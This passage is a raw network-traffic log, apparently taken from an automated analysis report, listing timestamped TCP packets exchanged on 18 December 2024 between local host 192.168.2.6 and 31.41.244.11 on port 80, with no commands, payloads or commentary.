                                                                                                                                                              Dec 18, 2024 11:47:19.081461906 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.082453012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.082515001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.082638979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.082779884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.083564997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.083622932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.213340044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.213453054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.213526964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.213941097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.214087009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.214148045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.215100050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.215229988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.215291023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.216259956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.216317892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.216536999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.217236996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.217407942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.217453003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.217531919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.218615055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.218703985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.218729973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.219803095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.219858885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.219892979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.220246077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.220952988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.221227884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.221285105 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.222103119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.222639084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.222718000 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.223269939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.223341942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.223481894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.224452019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.224509954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.224571943 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.225610018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.225667953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.226197004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.226784945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.226840019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.227319956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.227931976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.227988958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.229095936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.229125977 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.229137897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.229144096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.229166985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.229192972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.230293989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.230350971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.230406046 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.231441021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.231589079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.231638908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.232636929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.233433008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.233490944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.233808041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.233928919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.233978987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.234962940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.235018969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.235065937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.236161947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.236213923 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.236562967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.236912012 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.237354994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.237404108 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.237510920 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.238240004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.238491058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.238533020 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.238620043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.238658905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.239805937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.239860058 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.240077019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.240123987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.240832090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.240885973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.241049051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.241100073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.241988897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.242036104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.242270947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.242337942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.243163109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.243223906 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.243419886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.243465900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.244421959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.244474888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.244712114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.245532036 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.245570898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.245589972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.245620966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.246726990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.246798992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.246848106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.247828007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.247885942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.248059988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.248125076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.249018908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.249063969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.249177933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.249269009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.250183105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.250340939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.250581026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.250622988 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.251370907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.251410961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.251521111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.251558065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.252530098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.253326893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.253369093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.253680944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.254242897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.254285097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.254862070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.254903078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.255028009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.256063938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.256104946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.256128073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.256514072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.257170916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.257230997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.257579088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.257625103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.258354902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.258398056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.259026051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.259160042 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.259586096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.259624004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.259846926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.259895086 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.260730982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.260783911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.260955095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.260997057 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.261856079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.261925936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.261993885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.262036085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.263017893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.263060093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.263070107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.263104916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.264225006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.264898062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.264956951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.265358925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.265552044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.265592098 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.266532898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.266680002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.266719103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.267695904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.267749071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.268230915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.268996000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.269042015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.269356966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.269407034 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.270322084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.270366907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.270487070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.270528078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.271262884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.271337986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.271367073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.271550894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.272408962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.272448063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.272532940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.272568941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.273540974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.273583889 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.273637056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.273672104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.274688959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.274736881 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.405292988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.405467987 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.405611992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.405827999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.406011105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.406078100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.407021999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.407083035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.407200098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.408436060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.408485889 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.408874035 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.409435034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.409447908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.409490108 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.410594940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.410778999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.410834074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.411858082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.411870956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.411909103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.411932945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.412910938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.412957907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.413268089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.414213896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.414263964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.414438963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.415144920 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.415158033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.415205956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.415222883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.415664911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.415678024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.415726900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.415726900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.416778088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.417093039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.417144060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.418003082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.418064117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.418193102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.418560982 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.419099092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.419286013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.419333935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.422686100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.422707081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.422719955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.422730923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.422743082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.422756910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.422759056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.422777891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.423796892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.423854113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.424964905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.424978018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.424990892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.425029039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.425049067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.426126957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.426181078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.426326990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.426373005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.427419901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.427432060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.427478075 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.428750038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.429131985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.429219961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.429733992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.429810047 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.430130005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.430205107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.430804968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.430856943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.430942059 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.430983067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.431966066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.432014942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.432220936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.432272911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.433130980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.433321953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.433376074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.434305906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.434381008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.434475899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.435460091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.435511112 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.435535908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.436620951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.436654091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.436700106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.436785936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.436830044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.437860966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.437911987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.438083887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.438132048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.438987970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.439029932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.440186024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.440200090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.440215111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.440242052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.440242052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.440258026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.441328049 CET804980631.41.244.11192.168.2.6
